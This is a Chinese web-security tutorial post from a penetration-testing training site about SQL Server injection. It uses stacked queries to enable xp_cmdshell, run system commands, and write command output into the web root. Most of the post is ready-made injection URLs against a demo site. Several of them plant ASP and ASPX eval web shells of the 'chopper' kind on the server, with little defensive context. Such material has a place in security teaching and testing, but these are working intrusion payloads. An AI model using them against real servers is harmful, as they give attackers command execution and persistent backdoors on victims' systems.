1. 首页
  2. 渗透测试

[原创]WEB安全第四章SQL注入篇13 sqlserver执行系统命令

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

WEB安全第四章SQL注入篇13 sqlserver执行系统命令

在SQLSERVER中是可以执行多行操作的
两条SQL语句是用分号隔开
select * from art; select * from admin

xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。
如果用户拥有管理员sa权限则可以用sp_configure 重新开启它。


;EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;

[原创]WEB安全第四章SQL注入篇13 sqlserver执行系统命令

命令解释
EXEC sp_configure ‘show advanced options’,1//允许修改高级参数
RECONFIGUREEXEC sp_configure ‘xp_cmdshell’,1 //打开xp_cmdshell扩展RECONFIGURE

执行系统命令
EXEC master.dbo.xp_cmdshell ‘ipconfig’

开始xp_cmdshell
http://www.demo1.com/index.aspx?id=1;EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;

getshell

http://www.demo1.com/index.aspx?id=1;exec master..xp_cmdshell ‘echo ^<%eval request(chr(35))%^> > C:\inetpub\wwwroot\www.demo1.com\2.asp’ —

exec master..xp_cmdshell ‘echo ^<%eval request(chr(35))%^> > C:\inetpub\wwwroot\www.demo1.com\2.asp’–
exec master..xp_cmdshell ‘echo ^<%@ Page Language=”Jscript”%^>^<%eval(Request.Item[“chopper”],”unsafe”);%^>>D:\2.aspx’ –
http://www.demo1.com/index.aspx?id=1;exec master..xp_cmdshell ‘echo ^<%@ Page Language=”Jscript”%^>^<%eval(Request.Item[“chopper”],”unsafe”);%^>>C:\inetpub\wwwroot\www.demo1.com\2.aspx’ –
执行系统命令 把命令结果输出到指定文件
http://www.demo1.com/index.aspx?id=1;EXEC master.dbo.xp_cmdshell ‘ipconfig >>C:\inetpub\wwwroot\www.demo1.com\ip.txt’

http://www.demo1.com/index.aspx?id=1;EXEC master.dbo.xp_cmdshell ‘whoami >>C:\inetpub\wwwroot\www.demo1.com\ip.txt’

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/134.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息